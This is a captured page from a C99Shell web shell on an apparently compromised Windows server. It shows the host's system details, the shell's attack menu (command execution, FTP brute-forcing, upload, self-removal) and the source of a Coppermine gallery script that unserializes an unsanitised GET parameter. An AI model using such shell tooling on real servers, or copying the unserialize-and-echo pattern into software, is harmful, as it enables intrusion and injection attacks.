!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\cpg1418\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     displayreport.php (3.35 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*************************
  Coppermine Photo Gallery
  ************************
  Copyright (c) 2003-2008 Dev Team
  v1.1 originally written by Gregory DEMAR

  This program is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License version 3
  as published by the Free Software Foundation.
  
  ********************************************
  Coppermine version: 1.4.18
  $HeadURL: https://coppermine.svn.sourceforge.net/svnroot/coppermine/trunk/cpg1.4.x/displayreport.php $
  $Revision: 4380 $
  $Author: gaugau $
  $Date: 2008-04-12 12:00:19 +0200 (Sa, 12 Apr 2008) $
**********************************************/

define('IN_COPPERMINE'true);
define('DISPLAYREPORT_PHP'true);

require(
'include/init.inc.php');
require(
'include/smilies.inc.php');

if (!
GALLERY_ADMIN_MODE) {
    
cpg_die(ERROR$lang_errors['access_denied'], __FILE____LINE__);
}

if (!isset(
$_GET['data'])) cpg_die(CRITICAL_ERROR$lang_errors['param_missing'], __FILE____LINE__);

$data = array();
$data = @unserialize(@base64_decode($_GET['data']));

if (
is_array($data)) {

// Remove HTML tags as we can't trust what we receive
//foreach($data as $key => $value) $data[$key] = strtr($value, $HTML_SUBST);
// Load template parameters
    
if ($data['t'] == 'comment') {
        
$params = array('{LANG_DIR}' => $lang_text_dir,
            
'{TITLE}' => sprintf($lang_report_php['report_subject'], $data['sn'], $data['t']),
            
'{CHARSET}' => $CONFIG['charset'] == 'language file' $lang_charset $CONFIG['charset'],
            
'{VIEW_REPORT_TGT}' => '',
            
'{VIEW_REPORT_LNK}' => '',
            
'{URL_PREFIX}' => '',
            
'{SUBJECT}' => $data['su'],
            
'{MESSAGE}' => nl2br(process_smilies($data['m'])),
            
'{SENDER_EMAIL}' => $data['se'],
            
'{SENDER_NAME}' => $data['sn'],
            
'{VIEW_MORE_TGT}' => $CONFIG['ecards_more_pic_target'],
            
'{VIEW_MORE_LNK}' => $lang_report_php['view_more_pics'],
            
'{REASON}' => $data['r'],
            
'{COMMENT}' => $data['c'],
            
'{COMMENT_ID}' => $data['cid'],
            
'{VIEW_COMMENT_LNK}' => $lang_report_php['view_comment'],
            
'{COMMENT_LNK}' => $lang_report_php['go_comment'],
            
'{COMMENT_TGT}' => "{$CONFIG['ecards_more_pic_target']}displayimage.php?pos=-" $data['pid'] . "#comment" $data['cid'],
            
'{PID}' => $data['pid'],
            );
        
// Parse template if report is on a comment
        
echo template_eval($template_report_comment$params);

    } else {
            
$params = array('{LANG_DIR}' => $lang_text_dir,
                
'{TITLE}' => sprintf($lang_report_php['report_subject'], $data['sn'], $data['t']),
                
'{CHARSET}' => $CONFIG['charset'] == 'language file' $lang_charset $CONFIG['charset'],
                
'{VIEW_REPORT_TGT}' => '',
                
'{VIEW_REPORT_LNK}' => '',
                
'{PIC_URL}' => $data['p'],
                
'{PIC_TGT}' => "{$CONFIG['ecards_more_pic_target']}displayimage.php?pos=-" $data['pid'],
                
'{URL_PREFIX}' => '',
                
'{SUBJECT}' => $data['su'],
                
'{MESSAGE}' => nl2br(process_smilies($data['m'])),
                
'{SENDER_EMAIL}' => $data['se'],
                
'{SENDER_NAME}' => $data['sn'],
                
'{VIEW_MORE_TGT}' => $CONFIG['ecards_more_pic_target'],
                
'{VIEW_MORE_LNK}' => $lang_report_php['view_more_pics'],
                
'{REASON}' => $data['r'],
                
'{PID}' => $data['pid'],
                );
            
// Parse template
            
echo template_eval($template_report$params);
    }
} else {
        
cpg_die(CRITICAL_ERROR$lang_report_php['invalid_data'], __FILE____LINE__);
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0468 ]--